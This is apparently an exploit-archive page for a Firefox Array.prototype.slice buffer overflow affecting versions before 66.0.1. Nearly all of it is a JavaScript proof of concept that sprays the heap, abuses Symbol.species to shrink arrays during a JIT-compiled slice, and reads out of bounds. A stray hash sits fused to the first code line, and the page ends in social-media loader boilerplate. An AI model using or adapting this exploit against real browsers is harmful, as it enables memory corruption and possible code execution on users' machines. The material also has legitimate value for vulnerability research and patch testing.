Firefox Array.prototype.slice Buffer Overflow
Firefox versions prior to 66.0.1 suffer from an Array.prototype.slice buffer overflow vulnerability.
05b0051c9f42aaa5df708e6cd925a7celet size = 64;
garr = [];
j = 0;
function gc(){
var tmp = [];
for(let i = 0;i < 0x20000;i++){
tmp[i] = new Uint32Array(size * 2);
for(let j = 0;j < (size*2);j+=2){
tmp[i][j] = 0x12345678;
tmp[i][j+1] = 0xfffe0123;
}
}
garr[j++] = tmp;
}
let arr = [{},2.2];
let obj = {};
obj[Symbol.species] = function(){
victim.length = 0x0;
for(let i = 0;i < 0x2000;i++){
gvictim[i].length = 0x0;
gvictim[i] = null;
}
gc();
//Array.isArray(garr[0][0x10000]);
return [1.1];
}
let gvictim = [];
for(let i = 0;i < 0x1000;i++){
gvictim[i] = [1.1,2.2];
gvictim[i].length = size;
gvictim[i].fill(3.3);
}
let victim = [1.1,2.2];
victim.length = size;
victim.fill(3.3);
for(let i = 0x1000;i < 0x2000;i++){
gvictim[i] = [1.1,2.2];
gvictim[i].length = size;
gvictim[i].fill(3.3);
}
function fake(arg){
}
for(let i = 0;i < size;i++){
fake["x"+i.toString()] = 2.2;
}
function jit(){
victim[1] = 1.1;
arr.slice();
//fake.x2 = 6.17651672645e-312;
return victim[2];
}
flag = 0;
for(let i = 0;i < 0x10000;i++){
xx = jit();
}
arr.constructor = obj;
Array.isArray(victim);
alert(333);
alert(jit());
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "http://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.8&appId=409115965821184";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
Gloss